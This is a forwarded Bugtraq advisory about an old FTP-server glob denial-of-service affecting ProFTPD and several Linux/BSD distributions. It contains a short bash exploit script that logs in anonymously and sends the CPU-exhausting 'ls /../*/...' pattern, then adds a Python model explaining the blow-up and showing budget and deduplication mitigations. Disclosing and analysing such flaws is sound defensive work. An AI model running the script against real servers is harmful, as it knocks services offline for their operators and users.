Fwd: [bugtraq@securityfocus.com] Multiple-Vendor-FTP-Vuln. (old?)
I'm using proftpd 1.2.0pre10-2.0potato1, tried this vulnerability, and it still affects this version of proftpd.
I see that ftp://ftp.debian.org is still using this version, and I think it is also affected.
Thanks
Didit
------- Start of forwarded message -------
From: "Enrico Kern" <IphantomI@web.de>
To: bugtraq@securityfocus.com
Organization: http://freemail.web.de/
Subject: Multiple-Vendor-FTP-Vuln. (old?)
Date: 8/20/01 20:20:35
Hi,
I tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on many new Linux distributions. When a user logs in via ftp and types the ls command, in.ftpd takes over 90 percent CPU usage; execute the command 2 or 3 times and the whole system hangs. It also works on the console. I wonder why it is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ in March 01, but it still works, so I post it again.
affected:
RedHat Linux 7.x
Linux Mandrake 8.0
SuSE Linux 7.2
FreeBSD 4.3
AiX V 4.3
other?
Not vuln.:
latest Wu-Ftpd
Windows FTP-Server
Exploit:
#!/bin/bash
# Log in as anonymous and issue the glob that makes the server's ls explode
ftp -n FTP-SERVER <<\end
quot user anonymous
bin
quot pass shitold@bug.com
ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
bye
end
Fix:
set a CPU limit for your anonymous user.
-------- End of forwarded message --------
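Why the pattern above is so expensive, and what a server can do about it, is easier to see with a small model than with a live ftpd. The following is an added example, not code from Enrico Kern's post or from any FTP server: it expands a glob the way a naive server-side ls does (every candidate produced by one path component is expanded again by the next, and `..` of the chroot root is the root itself), over a constructed in-memory directory tree. Each `/../*` pair returns every match to the root and re-expands it, so the number of candidates multiplies by the directory's entry count at every repeat. The same function shows two mitigations: a work budget that aborts the expansion (the resource-limit approach the post recommends, applied inside the server rather than via the shell), and deduplicating candidates after each component so repeated `/../*` stops multiplying. The tree shape, the `build_tree`/`glob_walk` names and the budget values are assumptions made for the example.

```python
"""Added example (not from the post): how /../*/../*/../* blows up a naive
glob expansion, with a work budget and candidate deduplication as fixes.
Runs entirely against a constructed in-memory tree."""
from __future__ import annotations
import fnmatch


class GlobBudgetExceeded(Exception):
    """Raised when expansion inspects more entries than the caller allows."""


def build_tree(dirs: int, files: int) -> dict[str, list[str]]:
    """Constructed sample filesystem (assumption, not real data): a root
    standing in for the anonymous-FTP chroot, holding `dirs` subdirectories
    of `files` plain files each. Maps each directory path to its child names."""
    tree = {"/": [f"d{i}" for i in range(dirs)]}
    for i in range(dirs):
        tree[f"/d{i}"] = [f"f{j}" for j in range(files)]
    return tree


def dos_pattern(repeats: int) -> str:
    """The shape of the pattern from the post: '/../*' repeated."""
    return "/" + "/".join(["../*"] * repeats)


def _parent(path: str) -> str:
    # Inside a chroot, '..' of the root is the root itself.
    return "/" if path == "/" else (path.rsplit("/", 1)[0] or "/")


def _join(path: str, child: str) -> str:
    return f"/{child}" if path == "/" else f"{path}/{child}"


def glob_walk(tree: dict[str, list[str]], pattern: str, *,
              budget: int | None = None, dedupe: bool = False):
    """Expand `pattern` component by component like a naive ls: every
    candidate path produced by one component is expanded again by the next.
    Returns (matches, work) where work is the number of directory entries
    inspected.

    budget: abort once `work` exceeds it (resource-limit mitigation).
    dedupe: collapse duplicate candidates after each component, so the
            N copies of '/' produced by '..' are expanded once, not N times.
    """
    work = 0
    candidates = ["/"]
    for comp in pattern.strip("/").split("/"):
        nxt = []
        for path in candidates:
            if comp == "..":
                nxt.append(_parent(path))
                continue
            for child in tree.get(path, []):
                work += 1
                if budget is not None and work > budget:
                    raise GlobBudgetExceeded(f"{work} entries inspected")
                if fnmatch.fnmatchcase(child, comp):
                    nxt.append(_join(path, child))
        candidates = list(dict.fromkeys(nxt)) if dedupe else nxt
    return candidates, work


def exceeds_budget(tree: dict[str, list[str]], pattern: str, budget: int) -> bool:
    """True if expanding `pattern` would inspect more than `budget` entries."""
    try:
        glob_walk(tree, pattern, budget=budget)
    except GlobBudgetExceeded:
        return True
    return False


if __name__ == "__main__":
    tree = build_tree(dirs=10, files=2)
    for k in (1, 2, 3, 4):
        m, w = glob_walk(tree, dos_pattern(k))
        print(f"{k:2d} repeats: {len(m):8d} matches, {w:8d} entries inspected")
    print("12 repeats within a 100000-entry budget?",
          not exceeds_budget(tree, dos_pattern(12), 100_000))
    m, w = glob_walk(tree, dos_pattern(12), dedupe=True)
    print(f"12 repeats, deduplicated: {len(m)} matches, {w} entries inspected")
```

With 10 top-level entries the naive walk inspects 10 + 100 + 1000 + ... entries, so the twelve-repeat pattern from the post is of the order of 10^12 lookups; a real ftpd also allocates and sorts the matches, which is why the host, not just the daemon, falls over. Deduplicating after each component reduces the same pattern to a few dozen lookups, and the budget gives a hard stop for patterns that still get through.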